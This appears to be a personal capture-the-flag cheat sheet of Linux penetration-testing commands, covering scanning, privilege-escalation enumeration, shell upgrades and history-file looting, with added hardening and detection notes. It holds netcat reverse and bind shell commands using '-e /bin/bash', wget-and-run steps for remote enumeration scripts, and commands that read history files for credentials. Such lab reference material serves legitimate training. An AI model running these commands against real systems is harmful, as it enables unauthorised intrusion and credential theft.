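# ctf flag CTF
# NOTE: $(target) is a placeholder for the host under test. Typed literally in a
# shell it is command substitution (it runs a command named "target"), so
# replace it with the address or a quoted variable such as "$target".
# ping
ping $(target)
# nmap
nmap -p- -A $(target)
nmap -sV -sC --script vuln -oN blue.nmap 127.0.0.1
# enum4linux
enum4linux $(target)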
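# sudo -l
sudo -l
# cron
cat /etc/crontab
# - check the scripts that are executed as root: can you edit them?
# - check PATH: can you create a script that will be executed instead of the intended one?
# Hardening counterpart: root-run cron scripts, and every directory on the PATH
# set in the crontab, should be writable by root only, and jobs should call
# binaries by absolute path.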
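# linpeas.sh
# NOTE: this URL (like the LinEnum, lse and linux-exploit-suggester-2 URLs below)
# follows "latest" or "master", so the content fetched can change between runs.
# Prefer a tagged release, compare the download against the checksum of a copy
# you have already reviewed, and read the script before executing it.
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh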
chmod +x linpeas.sh
./linpeas.sh
# LinEnum.sh
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
chmod +x LinEnum.sh
./LinEnum.sh
# lse.sh
wget https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh
chmod +x lse.sh
./lse.sh
# linux exploit suggester 2
wget https://raw.githubusercontent.com/jondonas/linux-exploit-suggester-2/master/linux-exploit-suggester-2.pl
chmod +x linux-exploit-suggester-2.pl
perl linux-exploit-suggester-2.pl
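# python local server
# NOTE: with no arguments this serves the current working directory on port 8000,
# on every interface, without authentication. Use --bind ADDRESS and
# --directory DIR to limit what is exposed, and stop the server when the
# transfer is done.
python3 -m http.server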
# scp
scp -i id_rsa /home/kali/workspace/exploit/45010 barry@10.10.230.234:/home/barry/
# python shell
python -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
# CTRL+Z  (keystroke, not a command)
stty raw -echo; fg
# same sequence with python3
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
# CTRL+Z  (keystroke, not a command)
stty raw -echo; fg
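# netcat nc shell
# NOTE: both variants carry the shell in cleartext with no authentication; in
# the second one the listener runs on the target, so anything that can reach
# port 4444 gets the shell. For detection, the "-e /bin/bash" argument is
# visible in process listings and execve audit logs.
# variant 1: the target connects to the attacker's listener
ATTACKER: netcat -lvnp 4444
TARGET: netcat 10.18.9.175 4444 -e /bin/bash
--
# variant 2: the target listens and the attacker connects
TARGET: netcat -lvp 4444 -e /bin/bash
ATTACKER: netcat 10.10.161.83 4444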
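# gobuster
# NOTE: gobuster 3.x takes the mode as a subcommand (gobuster dir -u ... -w ...);
# the form below is the 2.x syntax.
gobuster -u http://10.10.10.24 -w /usr/share/wordlists/dirb/common.txt
# autorecon
autorecon 10.10.99.99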
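# SUID, SGID and Sticky Bits
# NOTE: the first command lists SUID files and the second lists SUID or SGID
# files; neither matches the sticky bit. Unexpected entries are easiest to spot
# by diffing the output against a known-good listing of the same image.
find / -perm -u=s -type f 2>/dev/null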
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
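# History
# NOTE: these files often retain credentials that were typed as command-line
# arguments. On systems you administer, keep them readable by the owner only
# and avoid passing secrets as arguments.
history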
cat ~/.bash_history | less
cat ~/.mysql_history | less
cat ~/.nano_history | less
cat ~/.*history | less
# hash
https://gchq.github.io/CyberChef/
# notes
joplin
xmind.net
cherrytree
keepnote